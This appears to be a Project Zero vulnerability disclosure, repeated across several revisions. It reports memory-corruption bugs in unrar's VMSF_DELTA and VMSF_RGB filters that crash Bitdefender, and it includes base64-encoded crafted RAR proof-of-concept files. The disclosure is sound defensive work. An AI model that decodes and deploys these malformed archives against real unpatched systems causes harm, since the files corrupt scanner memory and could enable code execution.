Bitdefender crashes when parsing malformed RAR files that target vulnerabilities in the code of unrar 4.2.4, which was obsoleted in 2013 with the release of 5.0.4.

Multiple vulnerabilities exists in the old rarvm.cpp; among others a read-from-arbitrary-address in the VMSF_RGB filter, and a write-to-arbitrary-address in the VMSF_DELTA filter. The code appears to be identical to the code described on page 10 and 11 of Tavis Ormandy's 2012 report on memory corruptions in Sophos AV (https://lock.cmpxchg8b.com/sophailv2.pdf).

This report includes two example files, one to trigger the VMSF_DELTA near-arbitrary write, and one to trigger the VMSF_RGB near-arbitrary read.

It is almost certain that these vulnerabilities can be turned into arbitrary code execution.

Given that many other fixes have happened to the unrar code base since 4.2.4, it is highly recommended that you upgrade the code as soon as possible and introduce measures to monitor security issues bugs in third-party code that you include.

Base64-encoded RAR file to trigger the VMSF_DELTA issue:

UmFyIRoHAPlOcwAADgAAAAAAAAAAMAh0AAAmAI4AAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwAmwAAAAAvv////+/////+9W3QFgAAQAGAAAA
Ooimhd12AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Base64-encoded RAR file to trigger the VMSF_RGB issue:

UmFyIRoHAPlOcwAADgAAAAAAAAAANNx0AAAmAAYBAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwCewAAAAAv71bdAG/////+9W3QFgAAQAGAAAB
KuksTlfcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 

rgb_filter_cause_read_access_segfault.rar 321 bytes Download

delta_filter.rar 201 bytes Download

Bitdefender crashes when parsing malformed RAR files. These RAR files were
crafted to target vulnerabilities in unrar 4.2.4 - and initially we suspected
that Bitdefender was linking outdated unrar code. Further investigation on
Bitdefenders side showed, though, that they are up-to-date with their
unrar code, and that one of the two targeted vulnerabilities was never fixed
in upstream unrar.

Please see https://bugs.chromium.org/p/project-zero/issues/detail?id=1286 for
the upstream bug report and further details.

Base64-encoded RAR file to trigger the VMSF_DELTA issue:

UmFyIRoHAPlOcwAADgAAAAAAAAAAMAh0AAAmAI4AAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwAmwAAAAAvv////+/////+9W3QFgAAQAGAAAA
Ooimhd12AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Special thanks to Bitdefender for their quick turnaround and thorough investigation
of the issue, and alerting us that one of the two issues reported by us persisted
in upstream unrar.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 

rgb_filter_cause_read_access_segfault.rar 321 bytes Download

delta_filter.rar 201 bytes Download

A crash was reported to Bitdefender caused by malformed RAR files which were
crafted to target vulnerabilities in unrar 4.2.4 - and initially we suspected
that Bitdefender was linking outdated unrar code. 

Further investigation on Bitdefenders side showed, though, that they are 
up-to-date with their unrar code, and that one of the two targeted vulnerabilities 
was never fixed in upstream unrar. Every other user of unrar is likely also
affected.

Please see https://bugs.chromium.org/p/project-zero/issues/detail?id=1286 for
the upstream bug report and further details.

Base64-encoded RAR file to trigger the VMSF_DELTA issue:

UmFyIRoHAPlOcwAADgAAAAAAAAAAMAh0AAAmAI4AAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwAmwAAAAAvv////+/////+9W3QFgAAQAGAAAA
Ooimhd12AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Special thanks to Bitdefender for their quick turnaround and thorough investigation
of the issue, and alerting us that one of the two issues reported by us persisted
in upstream unrar.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 

rgb_filter_cause_read_access_segfault.rar 321 bytes Download

delta_filter.rar 201 bytes Download

A crash was reported to Bitdefender caused by malformed RAR files which were
crafted to target vulnerabilities in unrar 4.2.4 - and initially we suspected
that Bitdefender was linking outdated unrar code. 

Further investigation on Bitdefenders side showed, though, that they are 
up-to-date with their unrar code, and that one of the two targeted vulnerabilities 
was never fixed in upstream unrar. Every other user of unrar is likely also
affected.

Please see https://bugs.chromium.org/p/project-zero/issues/detail?id=1286 for
the upstream bug report and further details.

Base64-encoded RAR file to trigger the VMSF_DELTA issue:

UmFyIRoHAPlOcwAADgAAAAAAAAAAMAh0AAAmAI4AAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwAmwAAAAAvv////+/////+9W3QFgAAQAGAAAA
Ooimhd12AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Special thanks to Bitdefender for their quick turnaround and thorough investigation
of the issue, and alerting us that one of the two issues reported by us persisted
in upstream unrar as well as shipping patches quickly.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 

rgb_filter_cause_read_access_segfault.rar 321 bytes Download

delta_filter.rar 201 bytes Download

A crash was reported to Bitdefender caused by malformed RAR files which were
crafted to target vulnerabilities in unrar 4.2.4 - and initially we suspected
that Bitdefender was linking outdated unrar code. 

Further investigation on Bitdefenders side showed, though, that they are 
up-to-date with their unrar code, and that one of the two targeted vulnerabilities 
was never fixed in upstream unrar. Every other user of unrar is likely also
affected.

Please see https://bugs.chromium.org/p/project-zero/issues/detail?id=1286 for
the upstream bug report and further details.

Base64-encoded RAR file to trigger the VMSF_DELTA issue:

UmFyIRoHAPlOcwAADgAAAAAAAAAAMAh0AAAmAI4AAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwAmwAAAAAvv////+/////+9W3QFgAAQAGAAAA
Ooimhd12AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Special thanks to Bitdefender for their quick turnaround and thorough investigation
of the issue, and alerting us that one of the two issues reported by us persisted
in upstream unrar as well as shipping patches quickly.

Bitdefender's subsequent audit of unrar code discovered a further vulnerability
in the same area which permitted memory corruption by providing a malformed 
VMSF_AUDIO filter. They quickly reported this to upstream, and the new release
should fix this issue as well.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 

rgb_filter_cause_read_access_segfault.rar 321 bytes Download

delta_filter.rar 201 bytes Download

A crash was reported to Bitdefender caused by malformed RAR files which were
crafted to target vulnerabilities in unrar 4.2.4 - and initially we suspected
that Bitdefender was linking outdated unrar code. 

Further investigation on Bitdefenders side showed, though, that they are 
up-to-date with their unrar code, and that one of the two targeted vulnerabilities 
was never fixed in upstream unrar. Every other user of unrar is likely also
affected.

Please see https://bugs.chromium.org/p/project-zero/issues/detail?id=1286 for
the upstream bug report and further details.

Base64-encoded RAR file to trigger the VMSF_DELTA issue:

UmFyIRoHAPlOcwAADgAAAAAAAAAAMAh0AAAmAI4AAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwAmwAAAAAvv////+/////+9W3QFgAAQAGAAAA
Ooimhd12AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Special thanks to Bitdefender for their quick turnaround and thorough investigation
of the issue, and alerting us that one of the two issues reported by us persisted
in upstream unrar as well as shipping patches quickly. After our initial report,
Bitdefender embarked on an audit of unrar code and discovered a further vulnerability
in the same area of the code which permitted memory corruption by providing a
malformed VMSF_AUDIO filter. They quickly reported this to upstream, and the new 
release should fix this issue as well. Great response!

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 

rgb_filter_cause_read_access_segfault.rar 321 bytes Download

delta_filter.rar 201 bytes Download